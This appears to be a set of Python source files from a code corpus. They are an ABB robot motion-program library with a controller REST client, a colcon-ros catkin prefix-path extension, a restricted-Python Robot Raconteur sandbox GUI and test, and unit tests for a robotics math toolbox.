v5 = speeddata(5,500,5000,1000)
v10 = speeddata(10,500,5000,1000)
v20 = speeddata(20,500,5000,1000)
v30 = speeddata(30,500,5000,1000)
v40 = speeddata(40,500,5000,1000)
v50 = speeddata(50,500,5000,1000)
v60 = speeddata(60,500,5000,1000)
v80 = speeddata(80,500,5000,1000)
v100 = speeddata(100,500,5000,1000)
v150 = speeddata(150,500,5000,1000)
v200 = speeddata(200,500,5000,1000)
v300 = speeddata(300,500,5000,1000)
v400 = speeddata(400,500,5000,1000)
v500 = speeddata(500,500,5000,1000)
v600 = speeddata(600,500,5000,1000)
v800 = speeddata(800,500,5000,1000)
v1000 = speeddata(1000,500,5000,1000)
v1500 = speeddata(1500,500,5000,1000)
v2000 = speeddata(2000,500,5000,1000)
v2500 = speeddata(2500,500,5000,1000)
v3000 = speeddata(3000,500,5000,1000)
v4000 = speeddata(4000,500,5000,1000)
v5000 = speeddata(5000,500,5000,1000)
v6000 = speeddata(6000,500,5000,1000)
v7000 = speeddata(7000,500,5000,1000)
vmax = speeddata(10000,500,5000,1000)
class zonedata(NamedTuple):
finep: bool
pzone_tcp: float
pzone_ori: float
pzone_eax: float
zone_ori: float
zone_leax: float
zone_reax: float
fine = zonedata(True,0,0,0,0,0,0)
z0 = zonedata(False,0.3,0.3,0.3,0.03,0.3,0.03)
z1 = zonedata(False,1,1,1,0.1,1,0.1)
z5 = zonedata(False,5,8,8,0.8,8,0.8)
z10 = zonedata(False,10,15,15,1.5,15,1.5)
z15 = zonedata(False,15,23,23,2.3,23,2.3)
z20 = zonedata(False,20,30,30,3.0,30,3.0)
z30 = zonedata(False,30,45,45,4.5,45,4.5)
z40 = zonedata(False,40,60,60,6.0,60,6.0)
z50 = zonedata(False,50,75,75,7.5,75,7.5)
z60 = zonedata(False,60,90,90,9.0,90,9.0)
z80 = zonedata(False,80,120,120,12,120,12)
z100 = zonedata(False,100,150,150,15,150,15)
z150 = zonedata(False,150,225,225,23,225,23)
z200 = zonedata(False,200,300,300,30,300,30)
class jointtarget(NamedTuple):
robax: np.ndarray # shape=(6,)
extax: np.ndarray # shape=(6,)
class pose(NamedTuple):
trans: np.ndarray # [x,y,z]
rot: np.ndarray # [qw,qx,qy,qz]
class confdata(NamedTuple):
cf1: float
cf4: float
cf6: float
cfx: float
class robtarget(NamedTuple):
trans: np.ndarray # [x,y,z]
rot: np.ndarray # [qw,qx,qy,qz]
robconf: confdata #
extax: np.ndarray # shape=(6,)
class loaddata(NamedTuple):
mass: float
cog: np.ndarray # shape=(3,)
aom: np.ndarray # shape=(4,)
ix: float
iy: float
iz: float
class tooldata(NamedTuple):
robhold: bool
tframe: pose
tload : loaddata
_speeddata_struct_fmt = struct.Struct("<4f")
def _speeddata_to_bin(z: speeddata):
return _speeddata_struct_fmt.pack(
z.v_tcp, z.v_ori, z.v_leax, z.v_reax
)
_zonedata_struct_fmt = struct.Struct("<7f")
def _zonedata_to_bin(z: zonedata):
return _zonedata_struct_fmt.pack(
0.0 if not z.finep else 1.0,
z.pzone_tcp, z.pzone_ori, z.pzone_eax, z.zone_ori, z.zone_leax, z.zone_reax
)
def _fix_array(arr, l):
if isinstance(arr,list):
assert len(arr) == l, f"Invalid array, expected array length {l}"
return np.array(arr,dtype=np.float64)
if arr.shape == (l,):
return arr
if arr.shape == (l,1) or arr.shape == (1,l):
return arr.flatten()
assert False, f"Invalid array, expected array length {l}"
_jointtarget_struct_fmt = struct.Struct("<12f")
def _jointtarget_to_bin(j: jointtarget):
r = _fix_array(j.robax,6).tolist()
e = _fix_array(j.extax,6).tolist()
return _jointtarget_struct_fmt.pack(*r, *e)
_pose_struct_fmt = struct.Struct("<7f")
def _pose_to_bin(p: pose):
p1 = _fix_array(p.trans,3).tolist()
q = _fix_array(p.rot,4).tolist()
return _pose_struct_fmt.pack(*p1,*q)
_confdata_struct_fmt = struct.Struct("<4f")
def _confdata_to_bin(c: confdata):
return _confdata_struct_fmt.pack(c.cf1, c.cf4, c.cf6, c.cfx)
_robtarget_extax_struct_fmt = struct.Struct("<6f")
def _robtarget_to_bin(r: robtarget):
pose_bin = _pose_to_bin(pose(r.trans,r.rot))
robconf_bin = _confdata_to_bin(r.robconf)
extax = _fix_array(r.extax,6).tolist()
extax_bin = _robtarget_extax_struct_fmt.pack(*extax)
return pose_bin + robconf_bin + extax_bin
_num_struct_fmt = struct.Struct("<f")
def _num_to_bin(f):
return _num_struct_fmt.pack(f)
_loaddata_struct_fmt = struct.Struct("<11f")
def _loaddata_to_bin(l: loaddata):
cog = _fix_array(l.cog,3)
aom = _fix_array(l.aom,4)
return _loaddata_struct_fmt.pack(
l.mass, *cog, *aom, l.ix, l.iy, l.iz
)
def _tooldata_to_bin(td: tooldata):
robhold_bin = _num_to_bin(0.0 if not td.robhold else 1.0)
tframe_bin = _pose_to_bin(td.tframe)
tload_bin = _loaddata_to_bin(td.tload)
return robhold_bin + tframe_bin + tload_bin
def _read_num(f: io.IOBase):
b = f.read(4)
return _num_struct_fmt.unpack(b)[0]
def _read_nums(f: io.IOBase, n: int):
return [_read_num(f) for _ in range(n)]
def _read_struct_io(f: io.IOBase, s: struct.Struct):
return s.unpack(f.read(s.size))
def _nums_to_rapid_array(nums: List[float]):
return "[" + ", ".join([str(n) for n in nums]) + "]"
def _read_struct_io_to_rapid_array(f: io.IOBase, s: struct.Struct):
nums = _read_struct_io(f,s)
return _nums_to_rapid_array(nums)
def _speeddata_io_to_rapid(f: io.IOBase):
return _read_struct_io_to_rapid_array(f,_speeddata_struct_fmt)
def _zonedata_io_to_rapid(f: io.IOBase):
nums = list(_read_struct_io(f, _zonedata_struct_fmt))
nums[0] = "TRUE" if nums[0] != 0 else "FALSE"
return _nums_to_rapid_array(nums)
def _jointtarget_io_to_rapid(f: io.IOBase):
nums = _read_struct_io(f,_jointtarget_struct_fmt)
return f"[{_nums_to_rapid_array(nums[:6])},{_nums_to_rapid_array(nums[6:])}]"
def _pose_io_to_rapid(f: io.IOBase):
nums = _read_struct_io(f, _pose_struct_fmt)
return f"[{_nums_to_rapid_array(nums[:3])},{_nums_to_rapid_array(nums[3:])}]"
def _confdata_io_to_rapid(f: io.IOBase):
return _read_struct_io_to_rapid_array(f, _confdata_struct_fmt)
def _extax_io_to_rapid(f: io.IOBase):
return _read_struct_io_to_rapid_array(f, _robtarget_extax_struct_fmt)
def _robtarget_io_to_rapid(f: io.IOBase):
pose_nums = _read_struct_io(f,_pose_struct_fmt)
trans_str = _nums_to_rapid_array(pose_nums[:3])
rot_str = _nums_to_rapid_array(pose_nums[3:])
robconf_str = _confdata_io_to_rapid(f)
extax_str = _extax_io_to_rapid(f)
return f"[{trans_str},{rot_str},{robconf_str},{extax_str}]"
def _loaddata_io_to_rapid(f: io.IOBase):
nums = _read_struct_io(f, _loaddata_struct_fmt)
return f"[{nums[0]},{_nums_to_rapid_array(nums[1:4])},{_nums_to_rapid_array(nums[4:8])},{nums[8]},{nums[9]},{nums[10]}]"
def _tooldata_io_to_rapid(f: io.IOBase):
robhold_num = _read_num(f)
robhold_str = "TRUE" if robhold_num != 0 else "FALSE"
tframe_str = _pose_io_to_rapid(f)
tload_str = _loaddata_io_to_rapid(f)
return f"[{robhold_str},{tframe_str},{tload_str}]"
def _moveabsj_io_to_rapid(f: io.IOBase):
cmd_num = _read_num(f)
op = _read_num(f)
assert op == 0x1
to_joint_pos_str = _jointtarget_io_to_rapid(f)
speed_str = _speeddata_io_to_rapid(f)
zone_str = _zonedata_io_to_rapid(f)
return f"MoveAbsJ {to_joint_pos_str}, {speed_str}, {zone_str}, motion_program_tool;"
def _movej_io_to_rapid(f: io.IOBase):
cmd_num = _read_num(f)
op = _read_num(f)
assert op == 0x2
to_point_str = _robtarget_io_to_rapid(f)
speed_str = _speeddata_io_to_rapid(f)
zone_str = _zonedata_io_to_rapid(f)
return f"MoveJ {to_point_str}, {speed_str}, {zone_str}, motion_program_tool;"
def _movel_io_to_rapid(f: io.IOBase):
cmd_num = _read_num(f)
op = _read_num(f)
assert op == 0x3
to_point_str = _robtarget_io_to_rapid(f)
speed_str = _speeddata_io_to_rapid(f)
zone_str = _zonedata_io_to_rapid(f)
return f"MoveL {to_point_str}, {speed_str}, {zone_str}, motion_program_tool;"
def _movec_io_to_rapid(f: io.IOBase):
cmd_num = _read_num(f)
op = _read_num(f)
assert op == 0x4
cir_point_str = _robtarget_io_to_rapid(f)
to_point_str = _robtarget_io_to_rapid(f)
speed_str = _speeddata_io_to_rapid(f)
zone_str = _zonedata_io_to_rapid(f)
return f"MoveC {cir_point_str}, {to_point_str}, {speed_str}, {zone_str}, motion_program_tool;"
def _waittime_io_to_rapid(f: io.IOBase):
cmd_num = _read_num(f)
op = _read_num(f)
assert op == 0x5
t = _read_num(f)
return f"WaitTime {t};"
tool0 = tooldata(True,pose([0,0,0],[1,0,0,0]),loaddata(0.001,[0,0,0.001],[1,0,0,0],0,0,0))
class MotionProgram:
def __init__(self,first_cmd_num: int=1, tool: tooldata = None, timestamp: str = None):
if timestamp is None:
timestamp = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S-%f")[:-2]
assert re.match(r"^\d{4}\-\d{2}\-\d{2}-\d{2}\-\d{2}\-\d{2}\-\d{4}$", timestamp)
self._timestamp = timestamp
self._f = io.BytesIO()
# Version number
self._f.write(_num_to_bin(10003))
if tool is None:
tool = tool0
self._f.write(_tooldata_to_bin(tool))
timestamp_ascii = timestamp.encode("ascii")
self._f.write(_num_to_bin(len(timestamp_ascii)))
self._f.write(timestamp_ascii)
self._cmd_num=first_cmd_num
def MoveAbsJ(self, to_joint_pos: jointtarget, speed: speeddata, zone: zonedata):
to_joint_pos_b = _jointtarget_to_bin(to_joint_pos)
speed_b = _speeddata_to_bin(speed)
zone_b = _zonedata_to_bin(zone)
self._f.write(_num_to_bin(self._cmd_num))
self._f.write(_num_to_bin(0x1))
self._f.write(to_joint_pos_b)
self._f.write(speed_b)
self._f.write(zone_b)
self._cmd_num+=1
def MoveJ(self, to_point: robtarget, speed: speeddata, zone: zonedata):
to_point_b = _robtarget_to_bin(to_point)
speed_b = _speeddata_to_bin(speed)
zone_b = _zonedata_to_bin(zone)
self._f.write(_num_to_bin(self._cmd_num))
self._f.write(_num_to_bin(0x2))
self._f.write(to_point_b)
self._f.write(speed_b)
self._f.write(zone_b)
self._cmd_num+=1
def MoveL(self, to_point: robtarget, speed: speeddata, zone: zonedata):
to_point_b = _robtarget_to_bin(to_point)
speed_b = _speeddata_to_bin(speed)
zone_b = _zonedata_to_bin(zone)
self._f.write(_num_to_bin(self._cmd_num))
self._f.write(_num_to_bin(0x3))
self._f.write(to_point_b)
self._f.write(speed_b)
self._f.write(zone_b)
self._cmd_num+=1
def MoveC(self, cir_point: robtarget, to_point: robtarget, speed: speeddata, zone: zonedata):
cir_point_b = _robtarget_to_bin(cir_point)
to_point_b = _robtarget_to_bin(to_point)
speed_b = _speeddata_to_bin(speed)
zone_b = _zonedata_to_bin(zone)
self._f.write(_num_to_bin(self._cmd_num))
self._f.write(_num_to_bin(0x4))
self._f.write(cir_point_b)
self._f.write(to_point_b)
self._f.write(speed_b)
self._f.write(zone_b)
self._cmd_num+=1
def WaitTime(self, t: float):
assert t > 0, "Wait time must be >0"
self._f.write(_num_to_bin(self._cmd_num))
self._f.write(_num_to_bin(0x5))
self._f.write(_num_to_bin(t))
self._cmd_num+=1
def get_program_bytes(self):
return self._f.getvalue()
def get_program_rapid(self, module_name="motion_program_exec_gen"):
program_bytes = self.get_program_bytes()
f = io.BufferedReader(io.BytesIO(program_bytes))
o = io.StringIO()
ver = _read_num(f)
tooldata_str = _tooldata_io_to_rapid(f)
timestamp_ascii_len = int(_read_num(f))
timestamp_ascii = f.read(timestamp_ascii_len)
timestamp_str = timestamp_ascii.decode('ascii')
print(f"MODULE {module_name}", file=o)
print(f" ! abb_motion_program_exec format version {ver}", file=o)
print(f" ! abb_motion_program_exec timestamp {timestamp_str}", file=o)
print(f" PERS tooldata motion_program_tool := {tooldata_str};", file=o)
print(f" PROC main()", file=o)
while True:
nums_bytes = f.peek(8)
if len(nums_bytes) < 8:
break
op = _num_struct_fmt.unpack_from(nums_bytes, 4)[0]
cmd_num = _num_struct_fmt.unpack_from(nums_bytes, 0)[0]
print(f" ! cmd_num = {cmd_num}",file=o)
if op == 0x1:
print(f" {_moveabsj_io_to_rapid(f)}",file=o)
elif op == 0x2:
print(f" {_movej_io_to_rapid(f)}",file=o)
elif op == 0x3:
print(f" {_movel_io_to_rapid(f)}",file=o)
elif op == 0x4:
print(f" {_movec_io_to_rapid(f)}",file=o)
elif op == 0x5:
print(f" {_waittime_io_to_rapid(f)}",file=o)
else:
assert False, f"Invalid command opcode: {op}"
print(" ENDPROC", file=o)
print("ENDMODULE", file=o)
return o.getvalue()
def get_timestamp(self):
return self._timestamp
class MotionProgramExecClient:
def __init__(self, base_url='http://127.0.0.1:80', username='Default User', password='<PASSWORD>'):
self.base_url=base_url
self.auth=requests.auth.HTTPDigestAuth(username, password)
self._session=requests.Session()
def _do_get(self, relative_url):
url="/".join([self.base_url, relative_url])
res=self._session.get(url, auth=self.auth)
try:
return self._process_response(res)
finally:
res.close()
def _do_post(self, relative_url, payload=None):
url="/".join([self.base_url, relative_url])
res=self._session.post(url, data=payload, auth=self.auth)
try:
return self._process_response(res)
finally:
res.close()
def _process_response(self, response):
soup=BeautifulSoup(response.text, features="html.parser")
if (response.status_code == 500):
raise Exception("Robot returning 500 Internal Server Error")
if (response.status_code == 200 or response.status_code == 201 \
or response.status_code==202 or response.status_code==204):
return soup.body
if soup.body is None:
raise Exception("Robot returning HTTP error " + str(response.status_code))
error_code=int(soup.find('span', attrs={'class':'code'}).text)
error_message1=soup.find('span', attrs={'class': 'msg'})
if (error_message1 is not None):
error_message=error_message1.text
else:
error_message="Received error from ABB robot: " + str(error_code)
raise ABBException(error_message, error_code)
def start(self, cycle='asis',tasks=['T_ROB1']):
rob_tasks = self.get_tasks()
for t in tasks:
assert t in rob_tasks, f"Cannot start unknown task {t}"
for rob_task in rob_tasks.values():
if not rob_task.motiontask:
continue
if rob_task.name in tasks:
if not rob_task.active:
self.activate_task(rob_task.name)
else:
if rob_task.active:
self.deactivate_task(rob_task.name)
payload={"regain": "continue", "execmode": "continue" , "cycle": cycle, "condition": "none", "stopatbp": "disabled", "alltaskbytsp": "true"}
res=self._do_post("rw/rapid/execution?action=start", payload)
def activate_task(self, task):
payload={}
self._do_post(f"rw/rapid/tasks/{task}?action=activate",payload)
def deactivate_task(self, task):
payload={}
self._do_post(f"rw/rapid/tasks/{task}?action=deactivate",payload)
def stop(self):
payload={"stopmode": "stop"}
res=self._do_post("rw/rapid/execution?action=stop", payload)
def resetpp(self):
res=self._do_post("rw/rapid/execution?action=resetpp")
def get_execution_state(self):
soup = self._do_get("rw/rapid/execution")
ctrlexecstate=soup.find('span', attrs={'class': 'ctrlexecstate'}).text
cycle=soup.find('span', attrs={'class': 'cycle'}).text
return RAPIDExecutionState(ctrlexecstate, cycle)
def get_controller_state(self):
soup = self._do_get("rw/panel/ctrlstate")
return soup.find('span', attrs={'class': 'ctrlstate'}).text
def get_operation_mode(self):
soup = self._do_get("rw/panel/opmode")
return soup.find('span', attrs={'class': 'opmode'}).text
def get_digital_io(self, signal, network='Local', unit='DRV_1'):
soup = self._do_get("rw/iosystem/signals/" + network + "/" + unit + "/" + signal)
state = soup.find('span', attrs={'class': 'lvalue'}).text
return int(state)
def set_digital_io(self, signal, value, network='Local', unit='DRV_1'):
lvalue = '1' if bool(value) else '0'
payload={'lvalue': lvalue}
res=self._do_post("rw/iosystem/signals/" + network + "/" + unit + "/" + signal + "?action=set", payload)
def get_rapid_variable(self, var):
soup = self._do_get("rw/rapid/symbol/data/RAPID/T_ROB1/" + var)
state = soup.find('span', attrs={'class': 'value'}).text
return state
def set_rapid_variable(self, var, value):
payload={'value': value}
res=self._do_post("rw/rapid/symbol/data/RAPID/T_ROB1/" + var + "?action=set", payload)
def read_file(self, filename):
url="/".join([self.base_url, "fileservice", filename])
res=self._session.get(url, auth=self.auth)
try:
return res.content
finally:
res.close()
def upload_file(self, filename, contents):
url="/".join([self.base_url, "fileservice" , filename])
res=self._session.put(url, contents, auth=self.auth)
assert res.ok, res.reason
res.close()
def delete_file(self, filename):
url="/".join([self.base_url, "fileservice" , filename])
res=self._session.delete(url, auth=self.auth)
res.close()
def read_event_log(self, elog=0):
o=[]
soup = self._do_get("rw/elog/" + str(elog) + "/?lang=en")
state=soup.find('div', attrs={'class': 'state'})
ul=state.find('ul')
for li in ul.findAll('li'):
seqnum = int(li.attrs["title"].split("/")[-1])
def find_val(v):
return li.find('span', attrs={'class': v}).text
msg_type=int(find_val('msgtype'))
code=int(find_val('code'))
tstamp=datetime.datetime.strptime(find_val('tstamp'), '%Y-%m-%d T %H:%M:%S')
title=find_val('title')
desc=find_val('desc')
conseqs=find_val('conseqs')
causes=find_val('causes')
actions=find_val('actions')
args=[]
nargs=int(find_val('argc'))
for i in range(nargs):
arg=find_val('arg%d' % (i+1))
args.append(arg)
o.append(RAPIDEventLogEntry(seqnum,msg_type,code,tstamp,args,title,desc,conseqs,causes,actions))
return o
def get_tasks(self):
o = {}
soup = self._do_get("rw/rapid/tasks")
state=soup.find('div', attrs={'class': 'state'})
ul=state.find('ul')
for li in ul.findAll('li'):
def find_val(v):
return li.find('span', attrs={'class': v}).text
name=find_val('name')
type_=find_val('type')
taskstate=find_val('taskstate')
excstate=find_val('excstate')
active=find_val('active') == "On"
motiontask=find_val("motiontask").lower() == "true"
o[name]=RAPIDTaskState(name,type_,taskstate,excstate,active,motiontask)
return o
def execute_motion_program(self, motion_program: MotionProgram, task="T_ROB1"):
b = motion_program.get_program_bytes()
assert len(b) > 0, "Motion program must not be empty"
filename = "$temp/motion_program.bin"
if task != "T_ROB1":
task_m = re.match(r"^.*[A-Za-z_](\d+)$",task)
if task_m:
filename_ind = int(task_m.group(1))
filename = f"$temp/motion_program{filename_ind}.bin"
def _upload():
self.upload_file(filename, b)
return self._execute_motion_program([task],_upload)
def execute_multimove_motion_program(self, motion_programs: List[MotionProgram], tasks=None):
if tasks is None:
tasks = [f"T_ROB{i+1}" for i in range(len(motion_programs))]
assert len(motion_programs) == len(tasks), \
"Motion program list and task list must have some length"
assert len(tasks) > 1, "Multimove program must have at least two tasks"
b = []
for mp in motion_programs:
b.append(mp.get_program_bytes())
assert len(b) > 0, "Motion program must not be empty"
filenames = []
for task in tasks:
filename = "$temp/motion_program.bin"
if task != "T_ROB1":
task_m = re.match(r"^.*[A-Za-z_](\d+)$",task)
if task_m:
filename_ind = int(task_m.group(1))
filename = f"$temp/motion_program{filename_ind}.bin"
filenames.append(filename)
assert len(filenames) == len(b)
def _upload():
for i in range(len(filenames)):
self.upload_file(filenames[i], b[i])
return self._execute_motion_program(tasks,_upload)
def _execute_motion_program(self, tasks, upload_fn: Callable[[],None]):
exec_state = self.get_execution_state()
assert exec_state.ctrlexecstate == "stopped"
#assert exec_state.cycle == "once"
ctrl_state = self.get_controller_state()
assert ctrl_state == "motoron"
log_before = self.read_event_log()
prev_seqnum = log_before[0].seqnum
self.resetpp()
upload_fn()
self.start(cycle='once',tasks=tasks)
while True:
exec_state = self.get_execution_state()
if exec_state.ctrlexecstate != "running":
break
time.sleep(0.05)
log_after_raw = self.read_event_log()
log_after = []
for l in log_after_raw:
if l.seqnum > prev_seqnum:
log_after.append(l)
elif prev_seqnum > 61440 and l.seqnum < 4096:
# Handle uint16 wraparound
log_after.append(l)
else:
break
failed = False
for l in log_after:
if l.msgtype >= 2:
if len(l.args) > 0 and l.args[0].lower() == "motion program failed":
assert False, l.args[1] + " " + l.args[2] + " " + l.args[3] + " " + l.args[4]
if l.msgtype >= 3:
failed = True
if failed:
assert False, "Motion Program Failed, see robot error log for details"
found_log_open = False
found_log_close = False
log_filename = ""
for l in log_after:
if l.code == 80003:
if l.args[0].lower() == "motion program log file closed":
assert not found_log_close, "Found more than one log closed message"
found_log_close = True
if l.args[0].lower() == "motion program log file opened":
assert not found_log_open, "Found more than one log opened message"
found_log_open = True
log_filename_m = re.search(r"(log\-[\d\-]+\.csv)",l.args[1])
assert log_filename_m, "Invalid log opened message"
log_filename = log_filename_m.group(1)
assert found_log_open and found_log_close and len(log_filename) > 0, "Could not find log file messages in robot event log"
log_contents = self.read_file(f"$temp/{log_filename}")
try:
self.delete_file(f"$temp/{log_filename}")
except:
pass
return log_contents
class ABBException(Exception):
def __init__(self, message, code):
super(ABBException, self).__init__(message)
self.code=code
class RAPIDExecutionState(NamedTuple):
ctrlexecstate: Any
cycle: Any
class RAPIDEventLogEntry(NamedTuple):
seqnum: int
msgtype: int
code: int
tstamp: datetime.datetime
args: List[Any]
title: str
desc: str
conseqs: str
causes: str
actions: str
class RAPIDTaskState(NamedTuple):
name: str
type_: str
taskstate: str
excstate: str
active: bool
motiontask: bool
def main():
j1 = jointtarget([10,20,30,40,50,60],[0]*6)
j2 = jointtarget([90,-91,60,-93,94,-95],[0]*6)
j3 = jointtarget([-80,81,-82,83,-84,85],[0]*6)
mp = MotionProgram()
mp.MoveAbsJ(j1,v1000,fine)
mp.MoveAbsJ(j2,v5000,fine)
mp.MoveAbsJ(j3,v500,fine)
mp.MoveAbsJ(j2,v5000,z50)
mp.MoveAbsJ(j3,v500,z200)
mp.MoveAbsJ(j2,v5000,fine)
mp.WaitTime(1)
r1 = robtarget([0.1649235*1e3, 0.1169957*1e3, 0.9502961*1e3], [ 0.6776466, -0.09003431, 0.6362069, 0.3576725 ], confdata(0,0,0,0),[0]*6)
r2 = robtarget([ 0.6243948*1e3, -0.479558*1e3 , 0.7073749*1e3], [ 0.6065634, -0.2193409, 0.6427138, -0.4133877], confdata(-1,-1,0,1),[0]*6)
r3 = robtarget([417.9236, 276.9956, 885.2959], [ 0.8909725 , -0.1745558 , 0.08864544, 0.4096832 ], confdata( 0., 1., -2., 0.),[0]*6)
r4 = robtarget([417.9235 , -11.00438, 759.2958 ], [0.7161292 , 0.1868255 , 0.01720813, 0.6722789 ], confdata( 0., 2., -2., 0.),[0]*6)
r5 = robtarget([ 417.9235, -173.0044, 876.2958], [0.6757616, 0.3854275, 0.2376617, 0.5816431], confdata(-1., 1., -1., 0.),[0]*6)
mp.MoveJ(r1,v500,fine)
mp.MoveJ(r2,v400,fine)
mp.MoveJ(r1,v500,z100)
mp.MoveJ(r2,v400,z100)
mp.MoveJ(r1,v500,fine)
mp.WaitTime(1.5)
mp.MoveJ(r3,v5000,fine)
mp.MoveL(r4,v200,fine)
mp.MoveL(r3,v200,fine)
mp.MoveL(r4,v1000,z100)
mp.MoveL(r3,v1000,z100)
mp.MoveL(r4,v1000,fine)
mp.WaitTime(2.5)
mp.MoveJ(r3,v5000,fine)
mp.MoveC(r4,r5,v200,z10)
mp.MoveC(r4,r3,v50,fine)
print(mp.get_program_rapid())
client = MotionProgramExecClient()
log_results = client.execute_motion_program(mp)
# Write log csv to file
# with open("log.csv","wb") as f:
# f.write(log_results)
# Or convert to string and use in memory
log_results_str = log_results.decode('ascii')
print(log_results_str)
if __name__ == "__main__":
main()
``` |
{
"source": "johnwason/colcon-ros",
"score": 2
} |
#### File: colcon_ros/prefix_path/catkin.py
```python
import os
from colcon_core.logging import colcon_logger
from colcon_core.plugin_system import satisfies_version
from colcon_core.prefix_path import PrefixPathExtensionPoint
logger = colcon_logger.getChild(__name__)
_get_cmake_prefix_path_warnings = set()
class CmakePrefixPath(PrefixPathExtensionPoint):
"""
Prefix path defined in the `CMAKE_PREFIX_PATH` environment variable.
The path must contain a `.catkin` file to be considered.
"""
# the priority needs to be lower than the ament prefix path extension
PRIORITY = 80
def __init__(self): # noqa: D107
super().__init__()
satisfies_version(
PrefixPathExtensionPoint.EXTENSION_POINT_VERSION, '^1.0')
def extend_prefix_path(self, paths): # noqa: D102
global _get_cmake_prefix_path_warnings
cmake_prefix_path = os.environ.get('CMAKE_PREFIX_PATH', '')
for path in cmake_prefix_path.split(os.pathsep):
if not path:
continue
if not os.path.exists(path):
if path not in _get_cmake_prefix_path_warnings:
logger.warning(
"The path '{path}' in the environment variable "
"CMAKE_PREFIX_PATH doesn't exist"
.format_map(locals()))
_get_cmake_prefix_path_warnings.add(path)
continue
if not os.path.exists(os.path.join(path, '.catkin')):
continue
for filename in os.listdir(path):
if filename.startswith('local_setup.'):
break
else:
parent_path = os.path.dirname(path)
marker_file = os.path.join(
parent_path, '.colcon_install_layout')
if not os.path.exists(marker_file):
if path not in _get_cmake_prefix_path_warnings:
logger.warning(
"The path '{path}' in the environment variable "
'CMAKE_PREFIX_PATH seems to be a catkin workspace '
"but it doesn't contain any 'local_setup.*' files."
' Maybe the catkin version is not up-to-date?'
.format_map(locals()))
_get_cmake_prefix_path_warnings.add(path)
continue
with open(marker_file, 'r') as h:
install_layout = h.read().rstrip()
if install_layout != 'isolated':
if path not in _get_cmake_prefix_path_warnings:
logger.warning(
"The path '{path}' in the environment variable "
"CMAKE_PREFIX_PATH doesn't use the expected "
"install layout 'isolated'.".format_map(locals()))
_get_cmake_prefix_path_warnings.add(path)
continue
path = parent_path
paths.append(path)
``` |
{
"source": "johnwason/restricted_python_robotraconteur_service",
"score": 2
} |
#### File: johnwason/restricted_python_robotraconteur_service/restricted_python_robotraconteur_service_gui.py
```python
from RobotRaconteur.Client import *
from js import document
from js import print_div
from js import ace
import traceback
def on_run_button_click(a):
function_name = document.getElementById("function_textbox").value
editor = ace.edit("editor")
script_src = editor.getValue()
print_div("Running function_named: " + function_name)
loop.call_soon(do_click(script_src,function_name))
async def do_click(script_src,function_name):
try:
await client.async_run_sandbox(script_src,function_name,None,None)
except Exception as e:
print_div(traceback.format_exc())
async def main():
global client
client = await RRN.AsyncConnectService("rr+ws://localhost:62354/?service=RestrictedPythonService",None,None,None,None)
run_button = document.getElementById("run_button")
run_button.onclick = on_run_button_click
loop = RR.WebLoop()
loop.call_soon(main())
```
#### File: restricted_python_robotraconteur_service/test/test_restricted_python_service_object.py
```python
import os,sys,inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0,parentdir)
import restricted_python_robotraconteur_service as res
c = res.RestrictedPythonService()
test_src = """
def hello():
print("Hello world!")
def hello_name(name):
print("Hello " + name)
"""
c.run_sandbox(test_src, "hello", None)
``` |
{
"source": "johnwason/rpi_general_robotics_toolbox_py",
"score": 2
} |
#### File: rpi_general_robotics_toolbox_py/test/test_general_robotics_toolbox.py
```python
import general_robotics_toolbox as rox
import numpy as np
import pytest
import sys
if (sys.version_info > (3, 0)):
xrange = range
#Numeric precision reduced for literals
eps = 1e-6 #np.finfo(np.float64).eps
#inches to meters conversion factor
#(use Pint package for any real programs)
in_2_m = 0.0254
def test_hat():
k=[1,2,3]
k_hat=rox.hat(k)
k_hat_t=np.array([[0, -3, 2], [3, 0, -1], [-2, 1,0]])
np.testing.assert_allclose(k_hat, k_hat_t)
def _rot_test(k, theta, rot_t):
rot=rox.rot(k, theta)
np.testing.assert_allclose(rot, rot_t, atol=1e-5)
def test_rot():
rot_1_t=np.array([[1,0,0], [0,0,1], [0,-1,0]]).T
_rot_test(np.array([1,0,0]), np.pi/2.0, rot_1_t)
rot_2_t=np.array([[0,0,-1], [0,1,0], [1,0,0]]).T
_rot_test(np.array([0,1,0]), np.pi/2.0, rot_2_t)
rot_3_t=np.array([[0,1,0], [-1,0,0], [0,0,1]]).T
_rot_test(np.array([0,0,1]), np.pi/2.0, rot_3_t)
#Random rotation
rot_4=np.array([[-0.5057639, -0.1340537,0.8521928], \
[0.6456962,-0.7139224,0.2709081], \
[0.5720833,0.6872731,0.4476342]])
_rot_test(np.array([0.4490221,0.30207945,0.84090853]), 2.65949884, rot_4)
def _R2rot_test(k1, theta1):
R = rox.rot(k1,theta1)
k2, theta2 = rox.R2rot(R)
if abs(theta1-theta2) > (theta1 + theta2):
k2 = -k2
theta2 = -theta2
np.testing.assert_allclose(theta1,theta2, atol=1e-6)
if (abs(theta1) < 1e-9):
return
if ((np.abs(theta1) - np.pi) < 1e-9):
if np.linalg.norm(k1+k2) < 1e-6:
np.testing.assert_allclose(k1,-k2, atol=1e-6)
return
np.testing.assert_allclose(k1,k2, atol=1e-6)
return
np.testing.assert_allclose(k1,k2, atol=1e-6)
def test_R2rot():
_R2rot_test(np.array([1,0,0]), np.pi/2.0)
_R2rot_test(np.array([0,1,0]), np.pi/2.0)
_R2rot_test(np.array([0,0,1]), np.pi/2.0)
_R2rot_test(np.array([0.4490221,0.30207945,0.84090853]), 2.65949884)
#Singularities
_R2rot_test([1,2,3]/np.linalg.norm([1,2,3]), 1e-10)
_R2rot_test([2,-1,3]/np.linalg.norm([2,-1,3]), np.pi + 1e-10)
_R2rot_test([-2,-1,3]/np.linalg.norm([-2,-1,3]), np.pi + 1e-10)
_R2rot_test([2,-1,-3]/np.linalg.norm([2,-1,-3]), np.pi + 1e-10)
_R2rot_test([0,-1,-3]/np.linalg.norm([0,-1,-3]), np.pi + 1e-10)
_R2rot_test([0,0,1], np.pi + 1e-10)
def test_screwmatrix():
k=[1, 2, 3]
G=rox.screw_matrix(k)
G_t=np.array([[ 1, 0, 0, 0, -3, 2], \
[ 0, 1, 0, 3, 0, -1], \
[ 0, 0, 1, -2, 1, 0], \
[ 0, 0, 0, 1, 0, 0], \
[ 0, 0, 0, 0, 1, 0], \
[ 0, 0, 0, 0, 0, 1,]])
np.testing.assert_allclose(G, G_t)
def test_R2q():
rot=np.array([[-0.5057639,-0.1340537,0.8521928], \
[0.6456962,-0.7139224,0.2709081], \
[0.5720833,0.6872731,0.4476342]])
